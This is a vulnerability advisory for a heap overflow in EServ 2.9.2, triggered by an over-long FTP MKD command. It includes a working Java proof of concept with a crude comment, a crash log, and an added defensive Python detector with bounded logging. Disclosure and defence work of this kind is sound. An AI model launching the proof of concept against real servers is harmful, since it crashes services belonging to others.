Buffer Overflow Condition in EServ

Reported June 6 by Andrew Lewis

VERSIONS AFFECTED
Etype Eserv 2.9.2

DESCRIPTION

The Eserv service can be made to crash by sending it overly long FTP commands. Because the length of the buffer is not checked, arbitrary code could potentially be executed on the server.

DEMONSTRATION CODE

--------------------------------------------------------
/* Proof of concept code for the heap overflow in EServ <= 2.9.2
 * Written 10/05/2000 by Andrew Lewis aka. Wizdumb [MDMA]
 */

import java.io.*;
import java.net.*;

class eservheap {

    public static void main(String[] args) throws IOException {

        if (args.length < 1) {
            System.out.println("Syntax: java eservheap [host] <user> <pass>");
            System.exit(1);
        }

        Socket soq = null;
        PrintWriter white = null;
        BufferedReader weed = null;

        try {
            soq = new Socket(args[0], 21);
            white = new PrintWriter(soq.getOutputStream(), true);
            weed = new BufferedReader(new InputStreamReader(soq.getInputStream()));
        } catch (Exception e) {
            System.out.println("Problems connecting :-/");
            System.exit(1);
        }

        weed.readLine();   // consume the FTP banner
        // Use the supplied credentials when host, user and pass are all given,
        // otherwise log in anonymously. (The comparison operator was lost in
        // extraction; ">= 3" restores the intended check.)
        String juzer = (args.length >= 3) ? ("USER " + args[1]) : "USER anonymous";
        String pasz = (args.length >= 3) ? ("PASS " + args[2]) : "PASS mdma";
        white.println(juzer + "\n" + pasz);
        weed.readLine();
        weed.readLine();

        white.print("MKD ");
        for (int i = 0; i < 10000; i++) white.print("A");   // 10000-byte directory name
        white.println(); // uNf! Who yoh daddy, bitch?
        weed.readLine();
        white.println("QUIT");
    }
}
--------------------------------------------------------

And no, you don't need write access to the directory for that to work -- like
I said, the heap overflow occurs in the logging. :)
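Since the overflow is triggered while the MKD argument is being logged rather than by the directory operation itself, a defender can both flag the over-long command in captured control traffic and bound what a logger copies. The following Python is an added example, not part of the original advisory or of EServ; the 512-byte limit and the sample session are constructed assumptions:

```python
# Added example (not from the advisory or EServ): flag FTP control-channel
# commands whose argument is long enough to hit the unchecked logging buffer
# the advisory describes, and show the bounded logging the server lacked.
# The 512-byte bound and the sample session are constructed assumptions.
from typing import List, Optional, Tuple

MAX_ARG_LEN = 512   # assumed sane upper bound for one FTP command argument


def parse_ftp_command(line: str) -> Optional[Tuple[str, str]]:
    """Split one client control line into (COMMAND, argument); None if malformed."""
    line = line.rstrip("\r\n")
    if not line:
        return None
    cmd, _, arg = line.partition(" ")
    if not cmd.isalpha():          # server replies ("220 ...") and junk are skipped
        return None
    return cmd.upper(), arg


def find_oversized_commands(session: List[str], limit: int = MAX_ARG_LEN) -> List[Tuple[int, str, int]]:
    """Return (line_no, command, argument_length) for every over-long command."""
    hits = []
    for n, raw in enumerate(session, start=1):
        parsed = parse_ftp_command(raw)
        if parsed is None:
            continue
        cmd, arg = parsed
        if len(arg) > limit:
            hits.append((n, cmd, len(arg)))
    return hits


def bounded_log_entry(cmd: str, arg: str, limit: int = MAX_ARG_LEN) -> str:
    """Build a log line whose argument is cut at a fixed bound, so the logger
    never copies more than `limit` bytes of client-controlled data."""
    if len(arg) > limit:
        arg = arg[:limit] + "...[%d bytes truncated]" % (len(arg) - limit)
    return "%s %s" % (cmd, arg)


# Constructed sample session mirroring the proof-of-concept traffic above.
SAMPLE_SESSION = [
    "USER anonymous\r\n",
    "PASS mdma\r\n",
    "MKD " + "A" * 10000 + "\r\n",
    "QUIT\r\n",
]

if __name__ == "__main__":
    for line_no, cmd, length in find_oversized_commands(SAMPLE_SESSION):
        print("line %d: %s argument is %d bytes (limit %d)" % (line_no, cmd, length, MAX_ARG_LEN))
        print(bounded_log_entry(cmd, "A" * length)[-40:])
```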

The following extract from e.log shows the effect of this code...

----------------------------------------
27.05.2000 17:02:19 Eserv/2.92 2986 1
EXCEPTION! CODE:C0000005 ADDRESS:49247E WORD:C! REGISTERS:
1C5EC6C 50 62 34 00 36 5D 4E 00 FF 5F 34 00 0C 27 00 00  Pb4.6]N.Ñ_4.."..
1C5EC7C E8 FD 00 00 41 00 00 00 48 FF C5 01 7E 24 49 00  ÉÜ..A...HÑå.~$I.
1C5EC8C 1B 00 00 00 46 02 01 00 9C EE C5 01 23 00 00 00  .....F..._Ïå.#...

/* Ie. Thread crashes on MKD, but has no effect on other threads */

USER DATA: 346250 HANDLER: 1C5EED0 RETURN STACK:
1C5EE9C : 498BB9 C!
1C5EEA0 : 4C2AF0 HOLD
1C5EEA4 : 4CAC34 HOLDS
/* these HOLDS are buggy - no length checking */
1C5EEA8 : 7FFFE6FC <not in the image>
1C5EEAC : 7FFFD8F4 <not in the image>
1C5EEB0 : 4CAC49 HOLDS
1C5EEB4 : 4E5E12 MKD
1C5EEB8 : 49B279 |DROP
1C5EEBC : 2 <not found>
1C5EEC0 : 339DE8 <not found>
1C5EEC4 : 270C <not found>
1C5EEC8 : 4C42C1 INTERPRET
1C5EECC : 4C303F NEW_CATCH
1C5EED0 : 1C5EF14 <not in the image>
----------------------------------------

VENDOR RESPONSE

The vendor is aware of this problem; however, no response was known at the time of this writing.

CREDITS
Discovered and reported by Andrew Lewis
